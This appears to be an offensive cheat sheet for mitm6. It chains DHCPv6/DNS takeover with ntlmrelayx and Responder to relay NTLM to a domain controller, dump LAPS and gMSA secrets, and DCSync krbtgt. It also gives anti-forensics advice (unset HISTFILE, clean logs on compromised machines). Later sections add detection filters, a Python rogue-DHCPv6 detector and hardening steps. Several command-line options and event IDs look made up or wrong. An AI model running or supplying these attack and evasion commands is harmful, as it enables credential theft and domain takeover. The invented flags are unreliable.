
mitm6

mitm6 exploits the default Windows configuration where IPv6 is enabled but not properly configured. It performs Man-in-the-Middle attacks by responding to DHCPv6 requests to become the default DNS server, then relaying NTLM credentials captured through DNS/WPAD resolution to targets like domain controllers.

```shell
# Install via pip
pip install mitm6

# From source
git clone https://github.com/dirkjanm/mitm6.git
cd mitm6
pip install -r requirements.txt
python setup.py install

# Verify installation (mitm6 has no --version flag; the argparse help page confirms it is on PATH)
mitm6 --help
```

  • Windows enables IPv6 by default but doesn’t configure it properly
  • mitm6 responds to DHCPv6 SOL_MAX_RT messages with rapid DHCPv6 replies
  • Attacker becomes the primary DNS server for the IPv6 network
  • Works on networks with Windows machines even if DHCPv6 is disabled
  • Victims request WPAD configuration via DNS
  • mitm6 responds with attacker-controlled WPAD server
  • WPAD forces authentication (NTLM) to proxy requests
  • Credentials are captured and relayed to targets
1. Listen for DHCPv6 traffic
2. Respond to DHCPv6 requests
3. Become default DNS server
4. Intercept WPAD DNS queries
5. Serve malicious WPAD config
6. Capture NTLM authentication
7. Relay to domain controller or other targets
```shell
# Listen on interface and take over DNS
mitm6 -i eth0

# Listen on all interfaces
mitm6
```

```shell
# Show detailed attack progress
mitm6 -i eth0 -v

# Very verbose
mitm6 -i eth0 -vv
```

```shell
# Use specific interface
mitm6 -i wlan0

# List available interfaces first
ip link show
ifconfig
```

```shell
# Target specific domain for WPAD
mitm6 -i eth0 -d contoso.local

# Multiple domains
mitm6 -i eth0 -d contoso.local -d example.com

# Use DNS suffix list from environment
mitm6 -i eth0 --dns-suffixes contoso.local,example.com
```

```shell
# Set IPv6 address range for DHCP replies
mitm6 -i eth0 --prefix fd00::/64

# Spoof specific IPv6 address as DNS server
mitm6 -i eth0 --ipv6-address fd00::1

# Disable DHCP replies (DNS only)
mitm6 -i eth0 --no-dhcp
```

```shell
# Enable WPAD server (default)
mitm6 -i eth0 --wpad

# Disable WPAD server
mitm6 -i eth0 --no-wpad

# Custom WPAD port
mitm6 -i eth0 --wpad-port 8080
```

```shell
# Redirect all DNS queries to attacker
mitm6 -i eth0

# Redirect specific domain
mitm6 -i eth0 -d contoso.local

# Set authoritative DNS server
mitm6 -i eth0 --dns-server 192.168.1.100
```

```shell
# Terminal 1: Run mitm6
mitm6 -i eth0 -d contoso.local

# Terminal 2: Run ntlmrelayx
ntlmrelayx.py -6 -t ldap://dc01.contoso.local -l /tmp/dump

# Create LDAP dump directory
mkdir -p /tmp/dump
```

```shell
# Relay to both LDAP and LDAPS
mitm6 -i eth0 -d contoso.local &
ntlmrelayx.py -6 -t ldap://dc01.contoso.local -t ldaps://dc01.contoso.local
```

```shell
# Set up the relay before starting mitm6
ntlmrelayx.py -6 -t ldap://dc01.contoso.local -w /tmp/output &

# Start DHCPv6/DNS takeover
mitm6 -i eth0 -d contoso.local

# Monitor for LDAP connections and NTLM relay
tail -f /tmp/output
```

Resource-Based Constrained Delegation (RBCD) Attack

```shell
# Dump LDAP and configure RBCD automatically
ntlmrelayx.py -6 -t ldap://dc01.contoso.local \
  --dump-laps \
  --dump-gmsa \
  -w /tmp/delegation_output

# mitm6 relays credentials to LDAP
mitm6 -i eth0 -d contoso.local
```

```shell
# Relay to DC with DCSync attack
ntlmrelayx.py -6 -t ldap://dc01.contoso.local \
  --dcsync-user CONTOSO\\krbtgt

mitm6 -i eth0 -d contoso.local
```

```shell
# Terminal 1: Run Responder (captures NTLM)
responder -i eth0 -A

# Terminal 2: Run mitm6 (DHCPv6/DNS takeover)
mitm6 -i eth0

# Terminal 3: Monitor for credentials
tail -f /tmp/responder-logs.txt
```

```shell
# Run Responder in listening mode
responder -i eth0 -I

# Run mitm6 in another terminal
mitm6 -i eth0 -d contoso.local

# Run ntlmrelayx to relay captured credentials
ntlmrelayx.py -t 192.168.1.100
```
```shell
# Use correct domain names to appear legitimate
mitm6 -i eth0 -d contoso.local

# Avoid ARP spoofing (mitm6 uses DHCPv6 instead)
# Less noisy than traditional MITM tools

# Use IPv6 - often overlooked and unmonitored
# Deploy on network segment with IPv6 traffic
# Run during off-hours to minimize detection
# Deploy for limited duration (minutes, not hours)

# Monitor for repeated failed NTLM attempts
# May indicate detection/alerting
```
  • Use legitimate-looking WPAD configurations
  • Avoid suspicious proxy settings in WPAD PAC
  • Keep mitm6 process running only while needed
  • Clean logs from compromised machines
  • Remove IPv6 routes after successful relay
```shell
# Disable bash history
unset HISTFILE

# Run commands directly without logging
mitm6 -i eth0 2>/dev/null

# Use in-memory execution if possible
# Avoid writing to disk
```
```shell
# Monitor for router advertisements (ICMPv6 type 134): a rogue RA from an
# unexpected link-local source is what triggers clients to send DHCPv6 SOLICITs.
# ip6[40] is the ICMPv6 type byte directly after the 40-byte IPv6 header, so
# this filter assumes no extension headers are present.
tcpdump -i eth0 -n 'icmp6 and ip6[40] == 134'

# Watch for rapid DHCPv6 replies (server port 547 -> client port 546)
tcpdump -i eth0 -n 'udp port 546 or udp port 547'

# Detect multiple DHCPv6 servers (more than one source answering SOLICIT on a segment)
# Alert on unusual IPv6 prefix advertisements
```
  • Event ID 6016 (DHCP Server): Unusual DHCP activity
  • Event ID 1202 (DNS): Unexpected DNS server changes
  • Event ID 4648 (Logon): Failed NTLM relays
  • Event ID 5152 (Windows Firewall): IPv6 rule violations
```shell
# Monitor DNS query patterns
# Alert on unexpected WPAD queries
# Watch for DNS resolution to unusual IPs
```
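The takeover described in the "how it works" bullets above (mitm6 answering DHCPv6 and handing clients itself as DNS server plus a search suffix) is visible in the DHCPv6 ADVERTISE/REPLY messages themselves, which is what the tcpdump filters above capture. The following added example, not code from the mitm6 project, parses raw DHCPv6 UDP payloads (RFC 8415 framing: one msg-type byte, a three-byte transaction id, then TLV options) and flags any server message whose Option 23 (DNS_SERVERS) or Option 24 (DOMAIN_LIST) is outside an allowlist. The resolver address `fd00::53`, the rogue link-local address `fe80::dead:beef` and both sample messages are constructed for the example.

```python
"""Flag DHCPv6 server messages (ADVERTISE / REPLY) that hand out an unexpected
DNS server or DNS search list. Added example; the sample messages at the bottom
are constructed, not captured."""
import ipaddress
import struct

ADVERTISE, REPLY = 2, 7                       # message types a DHCPv6 server sends
OPT_DNS_SERVERS, OPT_DOMAIN_LIST = 23, 24     # RFC 8415 option codes


def parse_dhcpv6(payload: bytes):
    """Return (msg_type, {option_code: [option_data, ...]}) for a DHCPv6 UDP payload."""
    if len(payload) < 4:
        raise ValueError("payload too short for a DHCPv6 header")
    msg_type = payload[0]
    options = {}
    offset = 4                                # skip msg-type (1) + transaction-id (3)
    while offset < len(payload):
        if offset + 4 > len(payload):
            raise ValueError("truncated option header")
        code, length = struct.unpack_from("!HH", payload, offset)
        offset += 4
        data = payload[offset:offset + length]
        if len(data) != length:
            raise ValueError("truncated option body")
        options.setdefault(code, []).append(data)
        offset += length
    return msg_type, options


def dns_servers(options):
    """Decode Option 23: a concatenation of 16-byte IPv6 addresses."""
    addrs = []
    for data in options.get(OPT_DNS_SERVERS, []):
        if len(data) % 16:
            raise ValueError("DNS_SERVERS length is not a multiple of 16")
        addrs.extend(ipaddress.IPv6Address(data[i:i + 16]) for i in range(0, len(data), 16))
    return addrs


def domain_list(options):
    """Decode Option 24: search names in DNS wire form (length-prefixed labels)."""
    names = []
    for data in options.get(OPT_DOMAIN_LIST, []):
        i, labels = 0, []
        while i < len(data):
            n = data[i]
            i += 1
            if n == 0:                        # terminating zero ends one name
                names.append(".".join(labels))
                labels = []
            else:
                labels.append(data[i:i + n].decode("ascii", "replace"))
                i += n
        if labels:                            # tolerate a name without its zero byte
            names.append(".".join(labels))
    return names


def check_dhcpv6_server_message(payload, allowed_dns, allowed_domains):
    """Return alert strings for a server message; an empty list means it looks legitimate."""
    msg_type, options = parse_dhcpv6(payload)
    if msg_type not in (ADVERTISE, REPLY):
        return []                             # client-originated messages are not judged here
    allowed_addrs = {ipaddress.IPv6Address(a) for a in allowed_dns}
    allowed_names = {d.lower() for d in allowed_domains}
    alerts = []
    for addr in dns_servers(options):
        if addr not in allowed_addrs:
            alerts.append(f"msg-type {msg_type}: unexpected DNS server {addr}")
        if addr.is_link_local:                # a real resolver is rarely advertised by link-local address
            alerts.append(f"msg-type {msg_type}: link-local DNS server {addr}")
    for name in domain_list(options):
        if name.lower() not in allowed_names:
            alerts.append(f"msg-type {msg_type}: unexpected search domain {name}")
    return alerts


def build_dhcpv6(msg_type, transaction_id, options):
    """Assemble a DHCPv6 payload from (code, data) pairs; used here to construct samples."""
    out = bytes([msg_type]) + transaction_id.to_bytes(3, "big")
    for code, data in options:
        out += struct.pack("!HH", code, len(data)) + data
    return out


# Constructed samples: a REPLY from the site resolver (fd00::53, assumed) and a
# rogue REPLY pointing clients at a link-local resolver (fe80::dead:beef, assumed).
CONTOSO_LOCAL_WIRE = b"\x07contoso\x05local\x00"
LEGIT_REPLY = build_dhcpv6(REPLY, 0x0A0B0C, [
    (OPT_DNS_SERVERS, ipaddress.IPv6Address("fd00::53").packed),
    (OPT_DOMAIN_LIST, CONTOSO_LOCAL_WIRE),
])
ROGUE_REPLY = build_dhcpv6(REPLY, 0x0A0B0D, [
    (OPT_DNS_SERVERS, ipaddress.IPv6Address("fe80::dead:beef").packed),
    (OPT_DOMAIN_LIST, CONTOSO_LOCAL_WIRE),
])

if __name__ == "__main__":
    for label, msg in (("legit", LEGIT_REPLY), ("rogue", ROGUE_REPLY)):
        print(label, check_dhcpv6_server_message(msg, ["fd00::53"], ["contoso.local"]))
```

To run it against live traffic, feed the UDP payload of each packet to port 546 into `check_dhcpv6_server_message`; the allowlist should contain the resolvers your real DHCPv6 server hands out (or be empty on segments where no DHCPv6 server exists, so that any ADVERTISE/REPLY at all is an alert).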
```cmd
# Disable IPv6 on non-IPv6 networks. There is no "netsh int ipv6 set state" command;
# the Microsoft-documented switch is the DisabledComponents registry value
# (0x20 = prefer IPv4 over IPv6, 0xFF = disable all IPv6 components except loopback).
# A reboot is required for the change to take effect.
reg add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters" /v DisabledComponents /t REG_DWORD /d 0x20 /f

# Block rogue DHCPv6 servers and router advertisements on the host with the
# built-in "Core Networking" Windows Firewall rules (deploy via GPO); this
# stops the takeover even where IPv6 stays enabled
netsh advfirewall firewall set rule name="Core Networking - Dynamic Host Configuration Protocol for IPv6(DHCPV6-In)" new action=block
netsh advfirewall firewall set rule name="Core Networking - Router Advertisement (ICMPv6-In)" new action=block

# Set DNS server statically (not via DHCP); "Ethernet" and 10.0.0.2 are placeholders
netsh interface ipv4 set dnsservers name="Ethernet" source=static address=10.0.0.2 register=primary

# Monitor for WPAD requests
# Block or control WPAD via GPO
```

```text
# Enable DHCP snooping on switch. IPv4 "ip dhcp snooping" does not inspect DHCPv6,
# so rogue DHCPv6 servers and router advertisements need the IPv6 first-hop
# security features (Cisco IOS syntax shown): DHCPv6 Guard and RA Guard
ipv6 dhcp guard policy DHCPV6_GUARD
 device-role client
ipv6 nd raguard policy RA_GUARD
 device-role host

# Attach both policies to access ports; uplinks toward the real router or
# DHCPv6 relay get separate policies with device-role server / router
interface range GigabitEthernet1/0/1 - 48
 ipv6 dhcp guard attach-policy DHCPV6_GUARD
 ipv6 nd raguard attach-policy RA_GUARD

# Keep IPv4 DHCP snooping as well
ip dhcp snooping
ip dhcp snooping vlan 1,100-200

# Trust uplink ports (interface context)
interface GigabitEthernet1/1/1
 ip dhcp snooping trust

# Insert option 82 (relay agent information) so the DHCP server sees the ingress port
ip dhcp snooping information option
```
  • Enable Attack Surface Reduction (ASR) rules
  • Block Office macros from creating child processes
  • Restrict Office applications from writing data
  • Monitor and block suspicious WPAD behavior
```shell
# Verify IPv6 is enabled on network
ip -6 route show

# Check if DHCPv6 is active
tcpdump -i eth0 'udp port 546'

# Ensure running with proper privileges
sudo mitm6 -i eth0

# Check interface is properly up
ip link show
```

```shell
# Verify ntlmrelayx is running
ps aux | grep ntlmrelayx

# Check target is reachable
ping -6 dc01.contoso.local

# Verify domain name is correct
nslookup -type=A contoso.local
```

```shell
# Check for network blocking
traceroute -6 target

# Verify no IPv6 filtering
ip6tables -L

# Test WPAD separately
curl -i http://wpad.contoso.local/wpad.dat
```